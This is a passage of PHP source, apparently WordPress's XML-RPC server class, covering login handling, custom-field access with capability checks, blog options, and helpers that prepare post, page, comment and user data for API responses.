* For more granular control over all XML-RPC methods and requests, see the {@see 'xmlrpc_methods'}
* and {@see 'xmlrpc_element_limit'} hooks.
*
* @since 3.5.0
*
* @param bool $is_enabled Whether XML-RPC is enabled. Default true.
*/
$this->is_enabled = apply_filters( 'xmlrpc_enabled', $is_enabled );
}
/**
* Makes private/protected methods readable for backward compatibility.
*
* @since 4.0.0
*
* @param string $name Method to call.
* @param array $arguments Arguments to pass when calling.
* @return array|IXR_Error|false Return value of the callback, false otherwise.
*/
public function __call( $name, $arguments ) {
if ( '_multisite_getUsersBlogs' === $name ) {
return $this->_multisite_getUsersBlogs( ...$arguments );
}
return false;
}
/**
* Serves the XML-RPC request.
*
* @since 2.9.0
*/
public function serve_request() {
$this->IXR_Server( $this->methods );
}
/**
* Tests XMLRPC API by saying, "Hello!" to client.
*
* @since 1.5.0
*
* @return string Hello string response.
*/
public function sayHello() {
return 'Hello!';
}
/**
* Tests XMLRPC API by adding two numbers for client.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 A number to add.
* @type int $1 A second number to add.
* }
* @return int Sum of the two given numbers.
*/
public function addTwoNumbers( $args ) {
$number1 = $args[0];
$number2 = $args[1];
return $number1 + $number2;
}
/**
* Logs user in.
*
* @since 2.8.0
*
* @param string $username User's username.
* @param string $password User's password.
* @return WP_User|false WP_User object if authentication passed, false otherwise.
*/
public function login(
$username,
#[\SensitiveParameter]
$password
) {
if ( ! $this->is_enabled ) {
$this->error = new IXR_Error( 405, sprintf( __( 'XML-RPC services are disabled on this site.' ) ) );
return false;
}
if ( $this->auth_failed ) {
$user = new WP_Error( 'login_prevented' );
} else {
$user = wp_authenticate( $username, $password );
}
if ( is_wp_error( $user ) ) {
$this->error = new IXR_Error( 403, __( 'Incorrect username or password.' ) );
// Flag that authentication has failed once on this wp_xmlrpc_server instance.
$this->auth_failed = true;
/**
* Filters the XML-RPC user login error message.
*
* @since 3.5.0
*
* @param IXR_Error $error The XML-RPC error message.
* @param WP_Error $user WP_Error object.
*/
$this->error = apply_filters( 'xmlrpc_login_error', $this->error, $user );
return false;
}
wp_set_current_user( $user->ID );
return $user;
}
/**
* Checks user's credentials. Deprecated.
*
* @since 1.5.0
* @deprecated 2.8.0 Use wp_xmlrpc_server::login()
* @see wp_xmlrpc_server::login()
*
* @param string $username User's username.
* @param string $password User's password.
* @return bool Whether authentication passed.
*/
public function login_pass_ok(
$username,
#[\SensitiveParameter]
$password
) {
return (bool) $this->login( $username, $password );
}
/**
* Escapes string or array of strings for database.
*
* @since 1.5.2
*
* @param string|array $data Escape single string or array of strings.
* @return string|void Returns with string is passed, alters by-reference
* when array is passed.
*/
public function escape( &$data ) {
if ( ! is_array( $data ) ) {
return wp_slash( $data );
}
foreach ( $data as &$v ) {
if ( is_array( $v ) ) {
$this->escape( $v );
} elseif ( ! is_object( $v ) ) {
$v = wp_slash( $v );
}
}
}
/**
* Sends error response to client.
*
* Sends an XML error response to the client. If the endpoint is enabled
* an HTTP 200 response is always sent per the XML-RPC specification.
*
* @since 5.7.3
*
* @param IXR_Error|string $error Error code or an error object.
* @param false $message Error message. Optional.
*/
public function error( $error, $message = false ) {
// Accepts either an error object or an error code and message
if ( $message && ! is_object( $error ) ) {
$error = new IXR_Error( $error, $message );
}
if ( ! $this->is_enabled ) {
status_header( $error->code );
}
$this->output( $error->getXml() );
}
/**
* Retrieves custom fields for post.
*
* @since 2.5.0
*
* @param int $post_id Post ID.
* @return array Custom fields, if exist.
*/
public function get_custom_fields( $post_id ) {
$post_id = (int) $post_id;
$custom_fields = array();
foreach ( (array) has_meta( $post_id ) as $meta ) {
// Don't expose protected fields.
if ( ! current_user_can( 'edit_post_meta', $post_id, $meta['meta_key'] ) ) {
continue;
}
$custom_fields[] = array(
'id' => $meta['meta_id'],
'key' => $meta['meta_key'],
'value' => $meta['meta_value'],
);
}
return $custom_fields;
}
/**
* Sets custom fields for post.
*
* @since 2.5.0
*
* @param int $post_id Post ID.
* @param array $fields Custom fields.
*/
public function set_custom_fields( $post_id, $fields ) {
$post_id = (int) $post_id;
foreach ( (array) $fields as $meta ) {
if ( isset( $meta['id'] ) ) {
$meta['id'] = (int) $meta['id'];
$pmeta = get_metadata_by_mid( 'post', $meta['id'] );
if ( ! $pmeta || (int) $pmeta->post_id !== $post_id ) {
continue;
}
if ( isset( $meta['key'] ) ) {
$meta['key'] = wp_unslash( $meta['key'] );
if ( $meta['key'] !== $pmeta->meta_key ) {
continue;
}
$meta['value'] = wp_unslash( $meta['value'] );
if ( current_user_can( 'edit_post_meta', $post_id, $meta['key'] ) ) {
update_metadata_by_mid( 'post', $meta['id'], $meta['value'] );
}
} elseif ( current_user_can( 'delete_post_meta', $post_id, $pmeta->meta_key ) ) {
delete_metadata_by_mid( 'post', $meta['id'] );
}
} elseif ( current_user_can( 'add_post_meta', $post_id, wp_unslash( $meta['key'] ) ) ) {
add_post_meta( $post_id, $meta['key'], $meta['value'] );
}
}
}
/**
* Retrieves custom fields for a term.
*
* @since 4.9.0
*
* @param int $term_id Term ID.
* @return array Array of custom fields, if they exist.
*/
public function get_term_custom_fields( $term_id ) {
$term_id = (int) $term_id;
$custom_fields = array();
foreach ( (array) has_term_meta( $term_id ) as $meta ) {
if ( ! current_user_can( 'edit_term_meta', $term_id ) ) {
continue;
}
$custom_fields[] = array(
'id' => $meta['meta_id'],
'key' => $meta['meta_key'],
'value' => $meta['meta_value'],
);
}
return $custom_fields;
}
/**
* Sets custom fields for a term.
*
* @since 4.9.0
*
* @param int $term_id Term ID.
* @param array $fields Custom fields.
*/
public function set_term_custom_fields( $term_id, $fields ) {
$term_id = (int) $term_id;
foreach ( (array) $fields as $meta ) {
if ( isset( $meta['id'] ) ) {
$meta['id'] = (int) $meta['id'];
$pmeta = get_metadata_by_mid( 'term', $meta['id'] );
if ( isset( $meta['key'] ) ) {
$meta['key'] = wp_unslash( $meta['key'] );
if ( $meta['key'] !== $pmeta->meta_key ) {
continue;
}
$meta['value'] = wp_unslash( $meta['value'] );
if ( current_user_can( 'edit_term_meta', $term_id ) ) {
update_metadata_by_mid( 'term', $meta['id'], $meta['value'] );
}
} elseif ( current_user_can( 'delete_term_meta', $term_id ) ) {
delete_metadata_by_mid( 'term', $meta['id'] );
}
} elseif ( current_user_can( 'add_term_meta', $term_id ) ) {
add_term_meta( $term_id, $meta['key'], $meta['value'] );
}
}
}
/**
* Sets up blog options property.
*
* Passes property through {@see 'xmlrpc_blog_options'} filter.
*
* @since 2.6.0
*/
public function initialise_blog_option_info() {
$this->blog_options = array(
// Read-only options.
'software_name' => array(
'desc' => __( 'Software Name' ),
'readonly' => true,
'value' => 'WordPress',
),
'software_version' => array(
'desc' => __( 'Software Version' ),
'readonly' => true,
'value' => get_bloginfo( 'version' ),
),
'blog_url' => array(
'desc' => __( 'WordPress Address (URL)' ),
'readonly' => true,
'option' => 'siteurl',
),
'home_url' => array(
'desc' => __( 'Site Address (URL)' ),
'readonly' => true,
'option' => 'home',
),
'login_url' => array(
'desc' => __( 'Login Address (URL)' ),
'readonly' => true,
'value' => wp_login_url(),
),
'admin_url' => array(
'desc' => __( 'The URL to the admin area' ),
'readonly' => true,
'value' => get_admin_url(),
),
'image_default_link_type' => array(
'desc' => __( 'Image default link type' ),
'readonly' => true,
'option' => 'image_default_link_type',
),
'image_default_size' => array(
'desc' => __( 'Image default size' ),
'readonly' => true,
'option' => 'image_default_size',
),
'image_default_align' => array(
'desc' => __( 'Image default align' ),
'readonly' => true,
'option' => 'image_default_align',
),
'template' => array(
'desc' => __( 'Template' ),
'readonly' => true,
'option' => 'template',
),
'stylesheet' => array(
'desc' => __( 'Stylesheet' ),
'readonly' => true,
'option' => 'stylesheet',
),
'post_thumbnail' => array(
'desc' => __( 'Post Thumbnail' ),
'readonly' => true,
'value' => current_theme_supports( 'post-thumbnails' ),
),
// Updatable options.
'time_zone' => array(
'desc' => __( 'Time Zone' ),
'readonly' => false,
'option' => 'gmt_offset',
),
'blog_title' => array(
'desc' => __( 'Site Title' ),
'readonly' => false,
'option' => 'blogname',
),
'blog_tagline' => array(
'desc' => __( 'Site Tagline' ),
'readonly' => false,
'option' => 'blogdescription',
),
'date_format' => array(
'desc' => __( 'Date Format' ),
'readonly' => false,
'option' => 'date_format',
),
'time_format' => array(
'desc' => __( 'Time Format' ),
'readonly' => false,
'option' => 'time_format',
),
'users_can_register' => array(
'desc' => __( 'Allow new users to sign up' ),
'readonly' => false,
'option' => 'users_can_register',
),
'thumbnail_size_w' => array(
'desc' => __( 'Thumbnail Width' ),
'readonly' => false,
'option' => 'thumbnail_size_w',
),
'thumbnail_size_h' => array(
'desc' => __( 'Thumbnail Height' ),
'readonly' => false,
'option' => 'thumbnail_size_h',
),
'thumbnail_crop' => array(
'desc' => __( 'Crop thumbnail to exact dimensions' ),
'readonly' => false,
'option' => 'thumbnail_crop',
),
'medium_size_w' => array(
'desc' => __( 'Medium size image width' ),
'readonly' => false,
'option' => 'medium_size_w',
),
'medium_size_h' => array(
'desc' => __( 'Medium size image height' ),
'readonly' => false,
'option' => 'medium_size_h',
),
'medium_large_size_w' => array(
'desc' => __( 'Medium-Large size image width' ),
'readonly' => false,
'option' => 'medium_large_size_w',
),
'medium_large_size_h' => array(
'desc' => __( 'Medium-Large size image height' ),
'readonly' => false,
'option' => 'medium_large_size_h',
),
'large_size_w' => array(
'desc' => __( 'Large size image width' ),
'readonly' => false,
'option' => 'large_size_w',
),
'large_size_h' => array(
'desc' => __( 'Large size image height' ),
'readonly' => false,
'option' => 'large_size_h',
),
'default_comment_status' => array(
'desc' => __( 'Allow people to submit comments on new posts.' ),
'readonly' => false,
'option' => 'default_comment_status',
),
'default_ping_status' => array(
'desc' => __( 'Allow link notifications from other blogs (pingbacks and trackbacks) on new posts.' ),
'readonly' => false,
'option' => 'default_ping_status',
),
);
/**
* Filters the XML-RPC blog options property.
*
* @since 2.6.0
*
* @param array $blog_options An array of XML-RPC blog options.
*/
$this->blog_options = apply_filters( 'xmlrpc_blog_options', $this->blog_options );
}
/**
* Retrieves the blogs of the user.
*
* @since 2.6.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type string $0 Username.
* @type string $1 Password.
* }
* @return array|IXR_Error Array contains:
* - 'isAdmin'
* - 'isPrimary' - whether the blog is the user's primary blog
* - 'url'
* - 'blogid'
* - 'blogName'
* - 'xmlrpc' - url of xmlrpc endpoint
*/
public function wp_getUsersBlogs( $args ) {
if ( ! $this->minimum_args( $args, 2 ) ) {
return $this->error;
}
// If this isn't on WPMU then just use blogger_getUsersBlogs().
if ( ! is_multisite() ) {
array_unshift( $args, 1 );
return $this->blogger_getUsersBlogs( $args );
}
$this->escape( $args );
$username = $args[0];
$password = $args[1];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/**
* Fires after the XML-RPC user has been authenticated but before the rest of
* the method logic begins.
*
* All built-in XML-RPC methods use the action xmlrpc_call, with a parameter
* equal to the method's name, e.g., wp.getUsersBlogs, wp.newPost, etc.
*
* @since 2.5.0
* @since 5.7.0 Added the `$args` and `$server` parameters.
*
* @param string $name The method name.
* @param array|string $args The escaped arguments passed to the method.
* @param wp_xmlrpc_server $server The XML-RPC server instance.
*/
do_action( 'xmlrpc_call', 'wp.getUsersBlogs', $args, $this );
$blogs = (array) get_blogs_of_user( $user->ID );
$struct = array();
$primary_blog_id = 0;
$active_blog = get_active_blog_for_user( $user->ID );
if ( $active_blog ) {
$primary_blog_id = (int) $active_blog->blog_id;
}
$current_network_id = get_current_network_id();
foreach ( $blogs as $blog ) {
// Don't include blogs that aren't hosted at this site.
if ( $blog->site_id !== $current_network_id ) {
continue;
}
$blog_id = $blog->userblog_id;
switch_to_blog( $blog_id );
$is_admin = current_user_can( 'manage_options' );
$is_primary = ( (int) $blog_id === $primary_blog_id );
$struct[] = array(
'isAdmin' => $is_admin,
'isPrimary' => $is_primary,
'url' => home_url( '/' ),
'blogid' => (string) $blog_id,
'blogName' => get_option( 'blogname' ),
'xmlrpc' => site_url( 'xmlrpc.php', 'rpc' ),
);
restore_current_blog();
}
return $struct;
}
/**
* Checks if the method received at least the minimum number of arguments.
*
* @since 3.4.0
*
* @param array $args An array of arguments to check.
* @param int $count Minimum number of arguments.
* @return bool True if `$args` contains at least `$count` arguments, false otherwise.
*/
protected function minimum_args( $args, $count ) {
if ( ! is_array( $args ) || count( $args ) < $count ) {
$this->error = new IXR_Error( 400, __( 'Insufficient arguments passed to this XML-RPC method.' ) );
return false;
}
return true;
}
/**
* Prepares taxonomy data for return in an XML-RPC object.
*
* @param WP_Taxonomy $taxonomy The unprepared taxonomy data.
* @param array $fields The subset of taxonomy fields to return.
* @return array The prepared taxonomy data.
*/
protected function _prepare_taxonomy( $taxonomy, $fields ) {
$_taxonomy = array(
'name' => $taxonomy->name,
'label' => $taxonomy->label,
'hierarchical' => (bool) $taxonomy->hierarchical,
'public' => (bool) $taxonomy->public,
'show_ui' => (bool) $taxonomy->show_ui,
'_builtin' => (bool) $taxonomy->_builtin,
);
if ( in_array( 'labels', $fields, true ) ) {
$_taxonomy['labels'] = (array) $taxonomy->labels;
}
if ( in_array( 'cap', $fields, true ) ) {
$_taxonomy['cap'] = (array) $taxonomy->cap;
}
if ( in_array( 'menu', $fields, true ) ) {
$_taxonomy['show_in_menu'] = (bool) $taxonomy->show_in_menu;
}
if ( in_array( 'object_type', $fields, true ) ) {
$_taxonomy['object_type'] = array_unique( (array) $taxonomy->object_type );
}
/**
* Filters XML-RPC-prepared data for the given taxonomy.
*
* @since 3.4.0
*
* @param array $_taxonomy An array of taxonomy data.
* @param WP_Taxonomy $taxonomy Taxonomy object.
* @param array $fields The subset of taxonomy fields to return.
*/
return apply_filters( 'xmlrpc_prepare_taxonomy', $_taxonomy, $taxonomy, $fields );
}
/**
* Prepares term data for return in an XML-RPC object.
*
* @param array|object $term The unprepared term data.
* @return array The prepared term data.
*/
protected function _prepare_term( $term ) {
$_term = $term;
if ( ! is_array( $_term ) ) {
$_term = get_object_vars( $_term );
}
// For integers which may be larger than XML-RPC supports ensure we return strings.
$_term['term_id'] = (string) $_term['term_id'];
$_term['term_group'] = (string) $_term['term_group'];
$_term['term_taxonomy_id'] = (string) $_term['term_taxonomy_id'];
$_term['parent'] = (string) $_term['parent'];
// Count we are happy to return as an integer because people really shouldn't use terms that much.
$_term['count'] = (int) $_term['count'];
// Get term meta.
$_term['custom_fields'] = $this->get_term_custom_fields( $_term['term_id'] );
/**
* Filters XML-RPC-prepared data for the given term.
*
* @since 3.4.0
*
* @param array $_term An array of term data.
* @param array|object $term Term object or array.
*/
return apply_filters( 'xmlrpc_prepare_term', $_term, $term );
}
/**
* Converts a WordPress date string to an IXR_Date object.
*
* @param string $date Date string to convert.
* @return IXR_Date IXR_Date object.
*/
protected function _convert_date( $date ) {
if ( '0000-00-00 00:00:00' === $date ) {
return new IXR_Date( '00000000T00:00:00Z' );
}
return new IXR_Date( mysql2date( 'Ymd\TH:i:s', $date, false ) );
}
/**
* Converts a WordPress GMT date string to an IXR_Date object.
*
* @param string $date_gmt WordPress GMT date string.
* @param string $date Date string.
* @return IXR_Date IXR_Date object.
*/
protected function _convert_date_gmt( $date_gmt, $date ) {
if ( '0000-00-00 00:00:00' !== $date && '0000-00-00 00:00:00' === $date_gmt ) {
return new IXR_Date( get_gmt_from_date( mysql2date( 'Y-m-d H:i:s', $date, false ), 'Ymd\TH:i:s' ) );
}
return $this->_convert_date( $date_gmt );
}
/**
* Prepares post data for return in an XML-RPC object.
*
* @param array $post The unprepared post data.
* @param array $fields The subset of post type fields to return.
* @return array The prepared post data.
*/
protected function _prepare_post( $post, $fields ) {
// Holds the data for this post. built up based on $fields.
$_post = array( 'post_id' => (string) $post['ID'] );
// Prepare common post fields.
$post_fields = array(
'post_title' => $post['post_title'],
'post_date' => $this->_convert_date( $post['post_date'] ),
'post_date_gmt' => $this->_convert_date_gmt( $post['post_date_gmt'], $post['post_date'] ),
'post_modified' => $this->_convert_date( $post['post_modified'] ),
'post_modified_gmt' => $this->_convert_date_gmt( $post['post_modified_gmt'], $post['post_modified'] ),
'post_status' => $post['post_status'],
'post_type' => $post['post_type'],
'post_name' => $post['post_name'],
'post_author' => $post['post_author'],
'post_password' => $post['post_password'],
'post_excerpt' => $post['post_excerpt'],
'post_content' => $post['post_content'],
'post_parent' => (string) $post['post_parent'],
'post_mime_type' => $post['post_mime_type'],
'link' => get_permalink( $post['ID'] ),
'guid' => $post['guid'],
'menu_order' => (int) $post['menu_order'],
'comment_status' => $post['comment_status'],
'ping_status' => $post['ping_status'],
'sticky' => ( 'post' === $post['post_type'] && is_sticky( $post['ID'] ) ),
);
// Thumbnail.
$post_fields['post_thumbnail'] = array();
$thumbnail_id = get_post_thumbnail_id( $post['ID'] );
if ( $thumbnail_id ) {
$thumbnail_size = current_theme_supports( 'post-thumbnail' ) ? 'post-thumbnail' : 'thumbnail';
$post_fields['post_thumbnail'] = $this->_prepare_media_item( get_post( $thumbnail_id ), $thumbnail_size );
}
// Consider future posts as published.
if ( 'future' === $post_fields['post_status'] ) {
$post_fields['post_status'] = 'publish';
}
// Fill in blank post format.
$post_fields['post_format'] = get_post_format( $post['ID'] );
if ( empty( $post_fields['post_format'] ) ) {
$post_fields['post_format'] = 'standard';
}
// Merge requested $post_fields fields into $_post.
if ( in_array( 'post', $fields, true ) ) {
$_post = array_merge( $_post, $post_fields );
} else {
$requested_fields = array_intersect_key( $post_fields, array_flip( $fields ) );
$_post = array_merge( $_post, $requested_fields );
}
$all_taxonomy_fields = in_array( 'taxonomies', $fields, true );
if ( $all_taxonomy_fields || in_array( 'terms', $fields, true ) ) {
$post_type_taxonomies = get_object_taxonomies( $post['post_type'], 'names' );
$terms = wp_get_object_terms( $post['ID'], $post_type_taxonomies );
$_post['terms'] = array();
foreach ( $terms as $term ) {
$_post['terms'][] = $this->_prepare_term( $term );
}
}
if ( in_array( 'custom_fields', $fields, true ) ) {
$_post['custom_fields'] = $this->get_custom_fields( $post['ID'] );
}
if ( in_array( 'enclosure', $fields, true ) ) {
$_post['enclosure'] = array();
$enclosures = (array) get_post_meta( $post['ID'], 'enclosure' );
if ( ! empty( $enclosures ) ) {
$encdata = explode( "\n", $enclosures[0] );
$_post['enclosure']['url'] = trim( htmlspecialchars( $encdata[0] ) );
$_post['enclosure']['length'] = (int) trim( $encdata[1] );
$_post['enclosure']['type'] = trim( $encdata[2] );
}
}
/**
* Filters XML-RPC-prepared date for the given post.
*
* @since 3.4.0
*
* @param array $_post An array of modified post data.
* @param array $post An array of post data.
* @param array $fields An array of post fields.
*/
return apply_filters( 'xmlrpc_prepare_post', $_post, $post, $fields );
}
/**
* Prepares post data for return in an XML-RPC object.
*
* @since 3.4.0
* @since 4.6.0 Converted the `$post_type` parameter to accept a WP_Post_Type object.
*
* @param WP_Post_Type $post_type Post type object.
* @param array $fields The subset of post fields to return.
* @return array The prepared post type data.
*/
protected function _prepare_post_type( $post_type, $fields ) {
$_post_type = array(
'name' => $post_type->name,
'label' => $post_type->label,
'hierarchical' => (bool) $post_type->hierarchical,
'public' => (bool) $post_type->public,
'show_ui' => (bool) $post_type->show_ui,
'_builtin' => (bool) $post_type->_builtin,
'has_archive' => (bool) $post_type->has_archive,
'supports' => get_all_post_type_supports( $post_type->name ),
);
if ( in_array( 'labels', $fields, true ) ) {
$_post_type['labels'] = (array) $post_type->labels;
}
if ( in_array( 'cap', $fields, true ) ) {
$_post_type['cap'] = (array) $post_type->cap;
$_post_type['map_meta_cap'] = (bool) $post_type->map_meta_cap;
}
if ( in_array( 'menu', $fields, true ) ) {
$_post_type['menu_position'] = (int) $post_type->menu_position;
$_post_type['menu_icon'] = $post_type->menu_icon;
$_post_type['show_in_menu'] = (bool) $post_type->show_in_menu;
}
if ( in_array( 'taxonomies', $fields, true ) ) {
$_post_type['taxonomies'] = get_object_taxonomies( $post_type->name, 'names' );
}
/**
* Filters XML-RPC-prepared date for the given post type.
*
* @since 3.4.0
* @since 4.6.0 Converted the `$post_type` parameter to accept a WP_Post_Type object.
*
* @param array $_post_type An array of post type data.
* @param WP_Post_Type $post_type Post type object.
*/
return apply_filters( 'xmlrpc_prepare_post_type', $_post_type, $post_type );
}
/**
* Prepares media item data for return in an XML-RPC object.
*
* @param WP_Post $media_item The unprepared media item data.
* @param string $thumbnail_size The image size to use for the thumbnail URL.
* @return array The prepared media item data.
*/
protected function _prepare_media_item( $media_item, $thumbnail_size = 'thumbnail' ) {
$_media_item = array(
'attachment_id' => (string) $media_item->ID,
'date_created_gmt' => $this->_convert_date_gmt( $media_item->post_date_gmt, $media_item->post_date ),
'parent' => $media_item->post_parent,
'link' => wp_get_attachment_url( $media_item->ID ),
'title' => $media_item->post_title,
'caption' => $media_item->post_excerpt,
'description' => $media_item->post_content,
'metadata' => wp_get_attachment_metadata( $media_item->ID ),
'type' => $media_item->post_mime_type,
'alt' => get_post_meta( $media_item->ID, '_wp_attachment_image_alt', true ),
);
$thumbnail_src = image_downsize( $media_item->ID, $thumbnail_size );
if ( $thumbnail_src ) {
$_media_item['thumbnail'] = $thumbnail_src[0];
} else {
$_media_item['thumbnail'] = $_media_item['link'];
}
/**
* Filters XML-RPC-prepared data for the given media item.
*
* @since 3.4.0
*
* @param array $_media_item An array of media item data.
* @param WP_Post $media_item Media item object.
* @param string $thumbnail_size Image size.
*/
return apply_filters( 'xmlrpc_prepare_media_item', $_media_item, $media_item, $thumbnail_size );
}
/**
* Prepares page data for return in an XML-RPC object.
*
* @param WP_Post $page The unprepared page data.
* @return array The prepared page data.
*/
protected function _prepare_page( $page ) {
// Get all of the page content and link.
$full_page = get_extended( $page->post_content );
$link = get_permalink( $page->ID );
// Get info the page parent if there is one.
$parent_title = '';
if ( ! empty( $page->post_parent ) ) {
$parent = get_post( $page->post_parent );
$parent_title = $parent->post_title;
}
// Determine comment and ping settings.
$allow_comments = comments_open( $page->ID ) ? 1 : 0;
$allow_pings = pings_open( $page->ID ) ? 1 : 0;
// Format page date.
$page_date = $this->_convert_date( $page->post_date );
$page_date_gmt = $this->_convert_date_gmt( $page->post_date_gmt, $page->post_date );
// Pull the categories info together.
$categories = array();
if ( is_object_in_taxonomy( 'page', 'category' ) ) {
foreach ( wp_get_post_categories( $page->ID ) as $cat_id ) {
$categories[] = get_cat_name( $cat_id );
}
}
// Get the author info.
$author = get_userdata( $page->post_author );
$page_template = get_page_template_slug( $page->ID );
if ( empty( $page_template ) ) {
$page_template = 'default';
}
$_page = array(
'dateCreated' => $page_date,
'userid' => $page->post_author,
'page_id' => $page->ID,
'page_status' => $page->post_status,
'description' => $full_page['main'],
'title' => $page->post_title,
'link' => $link,
'permaLink' => $link,
'categories' => $categories,
'excerpt' => $page->post_excerpt,
'text_more' => $full_page['extended'],
'mt_allow_comments' => $allow_comments,
'mt_allow_pings' => $allow_pings,
'wp_slug' => $page->post_name,
'wp_password' => $page->post_password,
'wp_author' => $author->display_name,
'wp_page_parent_id' => $page->post_parent,
'wp_page_parent_title' => $parent_title,
'wp_page_order' => $page->menu_order,
'wp_author_id' => (string) $author->ID,
'wp_author_display_name' => $author->display_name,
'date_created_gmt' => $page_date_gmt,
'custom_fields' => $this->get_custom_fields( $page->ID ),
'wp_page_template' => $page_template,
);
/**
* Filters XML-RPC-prepared data for the given page.
*
* @since 3.4.0
*
* @param array $_page An array of page data.
* @param WP_Post $page Page object.
*/
return apply_filters( 'xmlrpc_prepare_page', $_page, $page );
}
/**
* Prepares comment data for return in an XML-RPC object.
*
* @param WP_Comment $comment The unprepared comment data.
* @return array The prepared comment data.
*/
protected function _prepare_comment( $comment ) {
// Format page date.
$comment_date_gmt = $this->_convert_date_gmt( $comment->comment_date_gmt, $comment->comment_date );
if ( '0' === $comment->comment_approved ) {
$comment_status = 'hold';
} elseif ( 'spam' === $comment->comment_approved ) {
$comment_status = 'spam';
} elseif ( '1' === $comment->comment_approved ) {
$comment_status = 'approve';
} else {
$comment_status = $comment->comment_approved;
}
$_comment = array(
'date_created_gmt' => $comment_date_gmt,
'user_id' => $comment->user_id,
'comment_id' => $comment->comment_ID,
'parent' => $comment->comment_parent,
'status' => $comment_status,
'content' => $comment->comment_content,
'link' => get_comment_link( $comment ),
'post_id' => $comment->comment_post_ID,
'post_title' => get_the_title( $comment->comment_post_ID ),
'author' => $comment->comment_author,
'author_url' => $comment->comment_author_url,
'author_email' => $comment->comment_author_email,
'author_ip' => $comment->comment_author_IP,
'type' => $comment->comment_type,
);
/**
* Filters XML-RPC-prepared data for the given comment.
*
* @since 3.4.0
*
* @param array $_comment An array of prepared comment data.
* @param WP_Comment $comment Comment object.
*/
return apply_filters( 'xmlrpc_prepare_comment', $_comment, $comment );
}
/**
* Prepares user data for return in an XML-RPC object.
*
* @param WP_User $user The unprepared user object.
* @param array $fields The subset of user fields to return.
* @return array The prepared user data.
*/
protected function _prepare_user( $user, $fields ) {
$_user = array( 'user_id' => (string) $user->ID );
$user_fields = array(
'username' => $user->user_login,
'first_name' => $user->user_firstname,
'last_name' => $user->user_lastname,
'registered' => $this->_convert_date( $user->user_registered ),
'bio' => $user->user_description,
'email' => $user->user_email,
'nickname' => $user->nickname,
'nicename' => $user->user_nicename,
'url' => $user->user_url,
'display_name' => $user->display_name,
'roles' => $user->roles,
);
if ( in_array( 'all', $fields, true ) ) {
$_user = array_merge( $_user, $user_fields );
} else {
if ( in_array( 'basic', $fields, true ) ) {
$basic_fields = array( 'username', 'email', 'registered', 'display_name', 'nicename' );
$fields = array_merge( $fields, $basic_fields );
}
$requested_fields = array_intersect_key( $user_fields, array_flip( $fields ) );
$_user = array_merge( $_user, $requested_fields );
}
/**
* Filters XML-RPC-prepared data for the given user.
*
* @since 3.5.0
*
* @param array $_user An array of user data.
* @param WP_User $user User object.
* @param array $fields An array of user fields.
*/
return apply_filters( 'xmlrpc_prepare_user', $_user, $user, $fields );
}
/**
* Creates a new post for any registered post type.
*
* @since 3.4.0
*
* @link https://en.wikipedia.org/wiki/RSS_enclosure for information on RSS enclosures.
*
* @param array $args {
* Method arguments. Note: top-level arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 {
* Content struct for adding a new post. See wp_insert_post() for information on
* additional post fields
*
* @type string $post_type Post type. Default 'post'.
* @type string $post_status Post status. Default 'draft'
* @type string $post_title Post title.
* @type int $post_author Post author ID.
* @type string $post_excerpt Post excerpt.
* @type string $post_content Post content.
* @type string $post_date_gmt Post date in GMT.
* @type string $post_date Post date.
* @type string $post_password Post password (20-character limit).
* @type string $comment_status Post comment enabled status. Accepts 'open' or 'closed'.
* @type string $ping_status Post ping status. Accepts 'open' or 'closed'.
* @type bool $sticky Whether the post should be sticky. Automatically false if
* `$post_status` is 'private'.
* @type int $post_thumbnail ID of an image to use as the post thumbnail/featured image.
* @type array $custom_fields Array of meta key/value pairs to add to the post.
* @type array $terms Associative array with taxonomy names as keys and arrays
* of term IDs as values.
* @type array $terms_names Associative array with taxonomy names as keys and arrays
* of term names as values.
* @type array $enclosure {
* Array of feed enclosure data to add to post meta.
*
* @type string $url URL for the feed enclosure.
* @type int $length Size in bytes of the enclosure.
* @type string $type Mime-type for the enclosure.
* }
* }
* }
* @return int|IXR_Error Post ID on success, IXR_Error instance otherwise.
*/
public function wp_newPost( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$content_struct = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
// Convert the date field back to IXR form.
if ( isset( $content_struct['post_date'] ) && ! ( $content_struct['post_date'] instanceof IXR_Date ) ) {
$content_struct['post_date'] = $this->_convert_date( $content_struct['post_date'] );
}
/*
* Ignore the existing GMT date if it is empty or a non-GMT date was supplied in $content_struct,
* since _insert_post() will ignore the non-GMT date if the GMT date is set.
*/
if ( isset( $content_struct['post_date_gmt'] ) && ! ( $content_struct['post_date_gmt'] instanceof IXR_Date ) ) {
if ( '0000-00-00 00:00:00' === $content_struct['post_date_gmt'] || isset( $content_struct['post_date'] ) ) {
unset( $content_struct['post_date_gmt'] );
} else {
$content_struct['post_date_gmt'] = $this->_convert_date( $content_struct['post_date_gmt'] );
}
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.newPost', $args, $this );
unset( $content_struct['ID'] );
return $this->_insert_post( $user, $content_struct );
}
/**
* Helper method for filtering out elements from an array.
*
* @since 3.4.0
*
* @param int $count Number to compare to one.
* @return bool True if the number is greater than one, false otherwise.
*/
private function _is_greater_than_one( $count ) {
return $count > 1;
}
/**
* Encapsulates the logic for sticking a post and determining if
* the user has permission to do so.
*
* @since 4.3.0
*
* @param array $post_data
* @param bool $update
* @return void|IXR_Error
*/
private function _toggle_sticky( $post_data, $update = false ) {
$post_type = get_post_type_object( $post_data['post_type'] );
// Private and password-protected posts cannot be stickied.
if ( 'private' === $post_data['post_status'] || ! empty( $post_data['post_password'] ) ) {
// Error if the client tried to stick the post, otherwise, silently unstick.
if ( ! empty( $post_data['sticky'] ) ) {
return new IXR_Error( 401, __( 'Sorry, you cannot stick a private post.' ) );
}
if ( $update ) {
unstick_post( $post_data['ID'] );
}
} elseif ( isset( $post_data['sticky'] ) ) {
if ( ! current_user_can( $post_type->cap->edit_others_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to make posts sticky.' ) );
}
$sticky = wp_validate_boolean( $post_data['sticky'] );
if ( $sticky ) {
stick_post( $post_data['ID'] );
} else {
unstick_post( $post_data['ID'] );
}
}
}
/**
